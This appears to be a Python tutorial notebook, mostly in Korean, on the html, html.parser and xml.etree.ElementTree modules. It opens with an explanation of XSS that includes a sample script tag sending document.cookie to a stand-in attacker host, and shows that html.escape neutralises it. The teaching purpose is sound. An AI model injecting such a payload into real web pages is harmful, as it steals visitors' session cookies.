# XSS공격을 막으려면?
## html
### HTML문자를 이스케이프(escape)처리할 때 사용하는 모듈

XSS 공격이란?  

XSS(Cross-Site Scripting, 교차 사이트 스크립팅) 공격은 웹 응용프로그램에 존재하는 취약점을 기반으로 웹 서버와 클라이언트 간 통신 방식인 HTTP 프로토콜 동작 과정 중에 발생합니다. XSS는 웹사이트 관리자가 아닌 이가 웹 페이지에 악성 스크립트를 삽입할 수 있는 취약점입니다. 주로 여러 사용자가 보는 게시판에 악성 스크립트가 담긴 글을 올리는 형태로 이루어집니다.

In [3]:
import html

# Sample XSS payload: a script that redirects the visitor and appends the
# page's cookies to the attacker's URL.
src = '<script>location.href="http://hack.er/Cookie.php?cookie="+document.cookie</script>'

# Escape the markup characters. quote=True is the default and is spelled out
# here only to make explicit that double quotes are escaped as well.
# An escaped string is displayed by the browser exactly as it was typed, but
# it no longer acts as an HTML tag or script.
result = html.escape(src, quote=True)

print(result)

&lt;script&gt;location.href=&quot;http://hack.er/Cookie.php?cookie=&quot;+document.cookie&lt;/script&gt;


In [4]:
# To turn an escaped string back into the original HTML, use html.unescape().
html.unescape(result)

'<script>location.href="http://hack.er/Cookie.php?cookie="+document.cookie</script>'

# 웹 페이지에서 원하는 텍스트만 뽑으려면?
## html.parser
### HTML 문서를 파싱할 때 사용하는 모듈

In [6]:
'''
<html>
<head>
<title>Python Zen</title>
</head>
<body>
<h2>The Zen of Python, by Tim Peters</h2>
<ul>
  <li>Beautiful is better than ugly.</li>
  <li>Explicit is better than implicit.</li>
  <li>Simple is better than complex.</li>
  <li>Complex is better than complicated.</li>
  <li>Flat is better than nested.</li>
  <li>Sparse is better than dense.</li>
  <li>Readability counts.</li>
  <li>Special cases aren't special enough to break the rules.</li>
  <li>Although <strong>practicality</strong> beats purity.</li>
  <li>Errors should <strong>never</strong> pass silently.</li>
  <li>Unless explicitly silenced.</li>
  <li>In the face of ambiguity, refuse the temptation to guess.</li>
  <li>There should be one-- and preferably only one --obvious way to do it.</li>
  <li>Although that way may not be obvious at first unless you're Dutch.</li>
  <li><strong>Now</strong> is better than never.</li>
  <li>Although never is often better than <strong>right</strong> now.</li>
  <li>If the implementation is hard to explain, it's a bad idea.</li>
  <li>If the implementation is easy to explain, it may be a good idea.</li>
  <li>Namespaces are one honking great idea -- let's do more of those!</li>
</ul>
</body>
</html>
'''

"\n<html>\n<head>\n<title>Python Zen</title>\n</head>\n<body>\n<h2>The Zen of Python, by Tim Peters</h2>\n<ul>\n  <li>Beautiful is better than ugly.</li>\n  <li>Explicit is better than implicit.</li>\n  <li>Simple is better than complex.</li>\n  <li>Complex is better than complicated.</li>\n  <li>Flat is better than nested.</li>\n  <li>Sparse is better than dense.</li>\n  <li>Readability counts.</li>\n  <li>Special cases aren't special enough to break the rules.</li>\n  <li>Although <strong>practicality</strong> beats purity.</li>\n  <li>Errors should <strong>never</strong> pass silently.</li>\n  <li>Unless explicitly silenced.</li>\n  <li>In the face of ambiguity, refuse the temptation to guess.</li>\n  <li>There should be one-- and preferably only one --obvious way to do it.</li>\n  <li>Although that way may not be obvious at first unless you're Dutch.</li>\n  <li><strong>Now</strong> is better than never.</li>\n  <li>Although never is often better than <strong>right</strong> now.</l

In [8]:
#위 HTML 파일에서 내용을 굵은 글씨로 표시하는 <strong> 태그와 </strong> 태그 사이의 문자열을 모두 찾아서 출력하는 프로그램을 만들려면?

from html.parser import HTMLParser


class MyHTMLParser(HTMLParser):
    """Print and collect the text that appears inside ``<strong>`` elements.

    Every text chunk found between ``<strong>`` and ``</strong>`` is printed
    (one chunk per line) and also appended to ``strong_texts`` so callers can
    use the result programmatically.

    Attributes:
        is_strong: True while at least one ``<strong>`` element is open.
        strong_texts: Text chunks seen inside ``<strong>``, in document order.
    """

    def __init__(self):
        super().__init__()
        self.is_strong = False
        self.strong_texts = []
        # Number of currently open <strong> elements. A plain boolean would be
        # cleared by the inner </strong> of a nested pair and drop the rest of
        # the outer element's text.
        self._strong_depth = 0

    def handle_starttag(self, tag, attrs):
        """Enter (or nest deeper into) a ``<strong>`` region."""
        if tag == 'strong':
            self._strong_depth += 1
            self.is_strong = True

    def handle_endtag(self, tag):
        """Leave one level of ``<strong>``; the region ends at depth zero."""
        if tag == 'strong':
            # Clamp at zero so a stray </strong> cannot make the depth negative.
            self._strong_depth = max(self._strong_depth - 1, 0)
            self.is_strong = self._strong_depth > 0

    def handle_data(self, data):
        """Record and print ``data`` when it lies inside ``<strong>``."""
        if self.is_strong:
            self.strong_texts.append(data)
            print(data)


# Parse the sample HTML file and print every <strong> text it contains.
parser = MyHTMLParser()

# Decode explicitly as UTF-8 instead of relying on the platform's default
# locale encoding, which differs between systems.
with open('015HTML.html', encoding='utf-8') as f:
    parser.feed(f.read())

# Flush any text the parser is still buffering at the end of the input.
parser.close()

practicality
never
Now
right


# XML 문서를 만들려면?
## xml.etree.ElementTree
### XML문서를 만들 때 사용하는 모듈

In [9]:
#xml.etree.ElementTree 모듈을 사용하여 다음과 같은 note.xml 파일을 만들려면
'''
<note date="20120104">
    <to>Tove</to>
    <from>Jani</from>
    <heading>Reminder</heading>
    <body>Don't forget me this weekend!</body>
</note>
'''

'\n<note date="20120104">\n    <to>Tove</to>\n    <from>Jani</from>\n    <heading>Reminder</heading>\n    <body>Don\'t forget me this weekend!</body>\n</note>\n'

In [10]:

from xml.etree.ElementTree import Element, dump

# Build the <to> leaf first, then hang it under a fresh <note> root.
to = Element("to")
to.text = "Tove"

note = Element("note")
note.append(to)

# Write the note element to standard output as XML.
dump(note)

<note><to>Tove</to></note>


In [11]:
#서브엘리먼트(SubElement)를 이용하면 더 편리하게 태그를 추가할 수 있다.
from xml.etree.ElementTree import Element, SubElement, dump

note = Element("note")

# <to> is created as a standalone element and attached by hand.
to = Element("to")
to.text = "Tove"
note.append(to)

# SubElement() creates the child and attaches it to its parent in one call.
sender = SubElement(note, "from")
sender.text = "Jani"

dump(note)

<note><to>Tove</to><from>Jani</from></note>


In [12]:
#속성 추가
from xml.etree.ElementTree import Element, SubElement, dump

note = Element("note")

to = Element("to")
to.text = "Tove"
note.append(to)

sender = SubElement(note, "from")
sender.text = "Jani"

# Attach the date attribute to the root element.
note.set("date", "20120104")

dump(note)

<note date="20120104"><to>Tove</to><from>Jani</from></note>


In [14]:
#위 note.xml 파일 작성 코드

from xml.etree.ElementTree import Element, SubElement, dump

# Root element, created with its date attribute already in place.
note = Element("note", {"date": "20120104"})

to = Element("to")
to.text = "Tove"
note.append(to)

# The remaining children are plain tag/text pairs, added in document order.
for tag, text in (
    ("from", "Jani"),
    ("heading", "Reminder"),
    ("body", "Don't forget me this weekend!"),
):
    SubElement(note, tag).text = text

dump(note)

<note date="20120104"><to>Tove</to><from>Jani</from><heading>Reminder</heading><body>Don't forget me this weekend!</body></note>


In [15]:
from xml.etree.ElementTree import Element, SubElement

# Build the <note> document in memory.
note = Element("note")
note.attrib["date"] = "20120104"

to = Element("to")
to.text = "Tove"
note.append(to)

SubElement(note, "from").text = "Jani"
SubElement(note, "heading").text = "Reminder"
SubElement(note, "body").text = "Don't forget me this weekend!"

# Pretty-print the XML: serialize with ElementTree, then re-parse with
# minidom, whose toprettyxml() adds line breaks and indentation.
from xml.dom import minidom
import xml.etree.ElementTree as ET
xmlstr = minidom.parseString(ET.tostring(note)).toprettyxml(indent="  ")
print(xmlstr)

# Save the XML to a file. The generated XML declaration names no encoding, so
# XML parsers will assume UTF-8; write the file as UTF-8 explicitly instead of
# using the platform's default locale encoding.
with open('015note.xml', 'w', encoding='utf-8') as f:
    f.write(xmlstr)

<?xml version="1.0" ?>
<note date="20120104">
  <to>Tove</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend!</body>
</note>



#  XML에서 엘리먼트와 콘텐츠를 읽으려면?
## xml.etree.ElementTree
### XML문서를 파싱하고 검색할 때 사용하는 모듈

In [16]:
from xml.etree.ElementTree import parse

# Parse the XML file saved earlier, then take the root element of the
# resulting tree.
tree = parse("015note.xml")
note = tree.getroot()

In [19]:
# Read attribute values from the root element.
date_value = note.get("date", "19991231")  # second argument is the fallback value
attr_names = note.keys()
attr_pairs = note.items()

print(date_value)
print(attr_names)
print(attr_pairs)

20120104
['date']
[('date', '20120104')]


In [20]:
# Access child elements of the root by tag name.
from_tag = note.find("from")  # first matching child element
from_tags = note.findall("from")  # all matching child elements
from_text = note.findtext("from")  # text of the first matching child

In [31]:
#특정 태그의 모든 하위 엘리먼트를 순서대로 처리할 때는 다음처럼 iter() 함수를 사용

#from_childs = note.iter("from")

from xml.etree.ElementTree import parse

tree = parse("015note.xml")
note = tree.getroot()

# Print the root's date attribute first.
date = note.get("date")
print(date)

# Visit every element in the tree and print the text of each of its direct
# children.
for element in tree.iter():
    for sub in element:
        print(sub.text)

20120104
Tove
Jani
Reminder
Don't forget me this weekend!
